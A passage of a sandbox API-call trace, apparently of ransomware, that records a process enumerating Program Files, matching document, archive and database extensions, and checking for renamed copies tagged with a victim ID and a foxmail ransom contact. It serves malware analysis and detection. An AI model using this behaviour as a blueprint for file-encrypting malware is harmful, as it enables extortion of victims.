lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0241.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 61 [0241.834] lstrlenW (lpString=".zip") returned 4 [0241.834] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0241.834] lstrlenW (lpString=".rar") returned 4 [0241.834] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0241.834] lstrlenW (lpString=".bz2") returned 4 [0241.834] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0241.834] lstrlenW (lpString=".7z") returned 3 [0241.834] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0241.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 61 [0241.834] lstrlenW (lpString=".dbf") returned 4 [0241.834] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0241.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 61 [0241.834] lstrlenW (lpString=".1cd") returned 4 [0241.834] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0241.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TipRes.dll") returned 61 [0241.835] lstrlenW (lpString=".jpg") returned 4 [0241.835] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0241.835] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0241.835] lstrlenW (lpString="tipresx.dll") returned 11 [0241.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0241.835] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x356ff1c | out: lpFileSize=0x356ff1c*=12288) returned 1 [0241.835] CloseHandle (hObject=0x2b8) returned 1 [0241.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll")) returned 0x20 [0241.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll") returned 62 [0241.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll") returned 62 [0241.835] lstrlenW (lpString=".doc") returned 4 [0241.835] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0241.835] lstrlenW (lpString=".docx") returned 5 [0241.835] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0241.835] lstrlenW (lpString=".pdf") returned 4 [0241.836] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0241.836] lstrlenW (lpString=".xls") returned 4 [0241.836] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0241.836] lstrlenW (lpString=".xlsx") returned 5 [0241.836] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0241.836] lstrlenW (lpString=".ppt") returned 4 [0241.836] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0241.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tipresx.dll") returned 62 [0241.836] lstrlenW (lpString=".zip") returned 4 [0241.836] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0241.836] lstrlenW (lpString=".rar") returned 4 [0241.836] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0241.836] lstrlenW (lpString=".bz2") returned 4 [0241.836] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0241.836] lstrlenW (lpString=".7z") returned 3 [0241.836] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0251.389] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x356ff1c | out: lpFileSize=0x356ff1c*=15776) returned 1 [0251.389] CloseHandle (hObject=0x398) returned 1 [0251.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll")) returned 0x20 [0251.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0251.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0251.434] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x356ff1c | out: lpFileSize=0x356ff1c*=15264) returned 1 [0251.434] CloseHandle (hObject=0x38c) returned 1 [0251.434] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll")) returned 0x20 [0251.475] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0251.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0263.391] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omssms.cfg")) returned 1 Thread: id = 59 os_tid = 0x634 [0241.365] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3d63de8 [0241.365] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3d73df0 [0241.366] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e108 [0241.366] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x6) returned 0xb99c50 [0241.366] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e120 [0241.366] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x100000) returned 0x4290020 [0241.366] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e138 [0241.366] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e138, Size=0x20) returned 0xbbdc98 [0241.366] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e138 [0241.366] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e138, Size=0x20) returned 0xbbdcc0 [0241.366] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0241.366] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0241.366] Wow64DisableWow64FsRedirection (in: OldValue=0x36aff58 | out: OldValue=0x36aff58*=0x0) returned 1 [0241.366] lstrlenW (lpString="kernel32.dll") returned 12 [0241.366] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbdc98 | out: hHeap=0xb00000) returned 1 [0241.366] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0241.366] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbdcc0 | out: hHeap=0xb00000) returned 1 [0241.367] Sleep (dwMilliseconds=0x64) [0241.556] Sleep (dwMilliseconds=0x64) [0241.753] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0241.754] lstrlenW (lpString="boxed-join.avi") returned 14 [0241.754] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0241.814] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=33280) returned 1 [0241.814] CloseHandle (hObject=0x24c) returned 1 [0241.814] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0241.814] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0242.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0242.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0242.041] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0242.041] lstrlenW (lpString=".doc") returned 4 [0242.041] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0242.041] lstrlenW (lpString=".docx") returned 5 [0242.041] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0242.041] lstrlenW (lpString=".pdf") returned 4 [0242.041] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0242.041] lstrlenW (lpString=".xls") returned 4 [0242.042] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0242.042] lstrlenW (lpString=".xlsx") returned 5 [0242.042] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0242.042] lstrlenW (lpString=".ppt") returned 4 [0242.042] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0242.042] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0242.042] lstrlenW (lpString=".zip") returned 4 [0242.042] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0242.042] lstrlenW (lpString=".rar") returned 4 [0242.042] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0242.042] lstrlenW (lpString=".bz2") returned 4 [0242.042] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0242.042] lstrlenW (lpString=".7z") returned 3 [0242.042] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0242.042] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0242.042] lstrlenW (lpString=".dbf") returned 4 [0242.042] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0242.042] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0242.042] lstrlenW (lpString=".1cd") returned 4 [0242.042] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0242.042] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0242.042] lstrlenW (lpString=".jpg") returned 4 [0242.042] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0242.042] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0242.042] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0242.042] lstrlenW (lpString=".doc") returned 4 [0242.042] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0242.043] lstrlenW (lpString=".docx") returned 5 [0242.043] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0242.043] lstrlenW (lpString=".pdf") returned 4 [0242.043] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0242.043] lstrlenW (lpString=".xls") returned 4 [0242.043] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0242.043] lstrlenW (lpString=".xlsx") returned 5 [0242.043] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0242.043] lstrlenW (lpString=".ppt") returned 4 [0242.043] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0242.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0242.043] lstrlenW (lpString=".zip") returned 4 [0242.043] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0242.043] lstrlenW (lpString=".rar") returned 4 [0242.043] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0242.043] lstrlenW (lpString=".bz2") returned 4 [0242.043] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0242.043] lstrlenW (lpString=".7z") returned 3 [0242.043] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0242.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0242.043] lstrlenW (lpString=".dbf") returned 4 [0242.043] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0242.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0242.043] lstrlenW (lpString=".1cd") returned 4 [0242.043] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0242.043] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0242.043] lstrlenW (lpString=".jpg") returned 4 [0242.043] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0242.044] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0242.044] lstrlenW (lpString="oskmenu.xml") returned 11 [0242.044] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0242.554] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=215) returned 1 [0242.558] CloseHandle (hObject=0x370) returned 1 [0242.560] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml")) returned 0x20 [0242.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0242.565] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0242.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0242.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0242.568] lstrlenW (lpString=".doc") returned 4 [0242.569] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0242.570] lstrlenW (lpString=".docx") returned 5 [0242.571] lstrcmpiW (lpString1=".docx", lpString2="u.xml") returned -1 [0242.572] lstrlenW (lpString=".pdf") returned 4 [0242.574] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0242.575] lstrlenW (lpString=".xls") returned 4 [0242.576] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0242.576] lstrlenW (lpString=".xlsx") returned 5 [0242.577] lstrcmpiW (lpString1=".xlsx", lpString2="u.xml") returned -1 [0242.577] lstrlenW (lpString=".ppt") returned 4 [0242.577] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0242.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0242.577] lstrlenW (lpString=".zip") returned 4 [0242.577] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0242.577] lstrlenW (lpString=".rar") returned 4 [0242.577] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0242.577] lstrlenW (lpString=".bz2") returned 4 [0242.577] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0242.577] lstrlenW (lpString=".7z") returned 3 [0242.577] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0242.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0242.577] lstrlenW (lpString=".dbf") returned 4 [0242.577] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0242.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0242.577] lstrlenW (lpString=".1cd") returned 4 [0242.577] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0242.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0242.577] lstrlenW (lpString=".jpg") returned 4 [0242.577] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0242.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0242.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0242.578] lstrlenW (lpString=".doc") returned 4 [0242.578] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0242.578] lstrlenW (lpString=".docx") returned 5 [0242.578] lstrcmpiW (lpString1=".docx", lpString2="u.xml") returned -1 [0242.578] lstrlenW (lpString=".pdf") returned 4 [0242.578] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0242.578] lstrlenW (lpString=".xls") returned 4 [0242.578] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0242.578] lstrlenW (lpString=".xlsx") returned 5 [0242.578] lstrcmpiW (lpString1=".xlsx", lpString2="u.xml") returned -1 [0242.578] lstrlenW (lpString=".ppt") returned 4 [0242.578] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0242.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0242.578] lstrlenW (lpString=".zip") returned 4 [0242.578] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0242.578] lstrlenW (lpString=".rar") returned 4 [0242.578] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0242.578] lstrlenW (lpString=".bz2") returned 4 [0242.578] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0242.578] lstrlenW (lpString=".7z") returned 3 [0242.578] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0242.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0242.578] lstrlenW (lpString=".dbf") returned 4 [0242.578] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0242.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0242.578] lstrlenW (lpString=".1cd") returned 4 [0242.578] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0242.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu.xml") returned 76 [0242.578] lstrlenW (lpString=".jpg") returned 4 [0242.578] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0242.579] Sleep (dwMilliseconds=0x64) [0242.741] lstrcmpiW (lpString1=".inc", lpString2=".php") returned -1 [0242.741] lstrlenW (lpString="oledbvbs.inc") returned 12 [0242.741] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0242.897] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=9975) returned 1 [0242.899] CloseHandle (hObject=0x210) returned 1 [0242.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc")) returned 0x20 [0242.905] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0242.913] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0242.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0242.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0242.917] lstrlenW (lpString=".doc") returned 4 [0242.918] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0242.918] lstrlenW (lpString=".docx") returned 5 [0242.919] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0242.922] lstrlenW (lpString=".pdf") returned 4 [0242.923] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0242.924] lstrlenW (lpString=".xls") returned 4 [0242.924] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0242.925] lstrlenW (lpString=".xlsx") returned 5 [0242.925] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0242.926] lstrlenW (lpString=".ppt") returned 4 [0242.926] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0242.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0242.926] lstrlenW (lpString=".zip") returned 4 [0242.926] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0242.926] lstrlenW (lpString=".rar") returned 4 [0242.926] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0242.926] lstrlenW (lpString=".bz2") returned 4 [0242.926] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0242.926] lstrlenW (lpString=".7z") returned 3 [0242.926] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0242.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0242.926] lstrlenW (lpString=".dbf") returned 4 [0242.926] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0242.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0242.926] lstrlenW (lpString=".1cd") returned 4 [0242.926] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0242.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0242.926] lstrlenW (lpString=".jpg") returned 4 [0242.926] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0242.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0242.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0242.926] lstrlenW (lpString=".doc") returned 4 [0242.926] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0242.926] lstrlenW (lpString=".docx") returned 5 [0242.926] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0242.926] lstrlenW (lpString=".pdf") returned 4 [0242.926] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0242.926] lstrlenW (lpString=".xls") returned 4 [0242.927] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0242.927] lstrlenW (lpString=".xlsx") returned 5 [0242.927] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0242.927] lstrlenW (lpString=".ppt") returned 4 [0242.927] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0242.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0242.927] lstrlenW (lpString=".zip") returned 4 [0242.927] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0242.927] lstrlenW (lpString=".rar") returned 4 [0242.927] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0242.927] lstrlenW (lpString=".bz2") returned 4 [0242.927] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0242.927] lstrlenW (lpString=".7z") returned 3 [0242.927] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0242.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0242.927] lstrlenW (lpString=".dbf") returned 4 [0242.927] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0242.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0242.927] lstrlenW (lpString=".1cd") returned 4 [0242.927] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0242.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0242.927] lstrlenW (lpString=".jpg") returned 4 [0242.927] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0242.927] lstrcmpiW (lpString1=".png", lpString2=".php") returned 1 [0242.927] lstrlenW (lpString="NavigationLeft_ButtonGraphic.png") returned 32 [0242.927] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0243.018] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=5088) returned 1 